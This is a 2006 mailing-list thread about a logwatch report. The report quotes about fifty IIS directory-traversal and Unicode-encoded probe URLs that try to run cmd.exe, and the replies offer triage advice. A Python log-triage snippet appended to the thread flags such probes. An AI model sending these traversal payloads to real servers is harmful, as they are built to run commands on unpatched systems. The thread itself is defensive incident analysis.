
Date:  Wed, 20 Sep 2006 13:17:55 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:07128] Re: Concerned - anything to worry about??
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <003701c6dcd8$b68bf4f0$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <4510D8C2.1030206 (at mark) planetcentral.net>
X-Mail-Count: 07128

Nah, just means they were trying.  Take a look on the server via ssh, check
to see if you see any processes running that shouldn't be.  Look at the last
log to see if any logins occurred that weren't you.

> -----Original Message-----
> From: paul [mailto:paul (at mark) planetcentral.net]
> Sent: Wednesday, September 20, 2006 2:00 AM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:07105] Concerned - anything to worry about??
> 
> Checked my logwatch mail this morning and found this - is it anything to
> worry about???
> I mean I know they were looking for mostly Windows files, but does this
> mean my system's been compromised ????
> 
> Thx
> Paul
> 
>  total of 1 sites probed the server
>   www.mydomain.net 218.92.93.181
> 
> !!!! 50 possible successful probes
>  /cgi-bin/cmd.exe?/c+dir HTTP Response 302
>  /bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/root.exe?/c+dir HTTP Response 302
>  /_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/cmd32.exe?/c+dir HTTP Response 302
>  /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /Cgi-Bin/cmd32.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /script/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-Bin/cmd.exe?/c+dir HTTP Response 302
>  /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
> 
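
Added example, not part of the original thread: a small Python triage of web access-log lines that keeps only requests for the Windows/IIS paths seen in the report above and groups them per client by response class, so a 302 redirect is told apart from a 2xx where content was actually served. The Apache common/combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Markers of requests aimed at Windows/IIS paths, taken from the report above.
WINDOWS_PROBE = re.compile(
    r'cmd(32)?\.exe|root\.exe|/winnt/|/_vti_bin/|/_mem_bin/|/msadc/', re.I
)

def classify(status):
    """Map an HTTP status to what it says about the probe's outcome."""
    if 200 <= status < 300:
        return "served"       # content was returned: inspect by hand
    if 300 <= status < 400:
        return "redirected"   # redirect issued, no command output in the reply
    return "rejected"         # anything else (4xx/5xx in practice)

def triage(lines):
    """Return {client_ip: {outcome: count}} for Windows-targeted probes only."""
    result = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not WINDOWS_PROBE.search(m.group("path")):
            continue  # unparseable line or ordinary request
        result[m.group("ip")][classify(int(m.group("status")))] += 1
    return {ip: dict(counts) for ip, counts in result.items()}

def needs_review(report):
    """Clients with at least one probe that received a 2xx response."""
    return sorted(ip for ip, c in report.items() if c.get("served"))

# Constructed sample lines (addresses are documentation ranges, not real hosts).
SAMPLE = [
    '203.0.113.7 - - [20/Sep/2006:01:12:03 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 290',
    '203.0.113.7 - - [20/Sep/2006:01:12:04 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 290',
    '203.0.113.7 - - [20/Sep/2006:01:12:05 -0400] "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '198.51.100.9 - - [20/Sep/2006:01:15:00 -0400] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.9 - - [20/Sep/2006:01:15:02 -0400] "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 812',
]

if __name__ == "__main__":
    report = triage(SAMPLE)
    for ip, counts in sorted(report.items()):
        print(ip, counts)
    print("review by hand:", needs_review(report))
```
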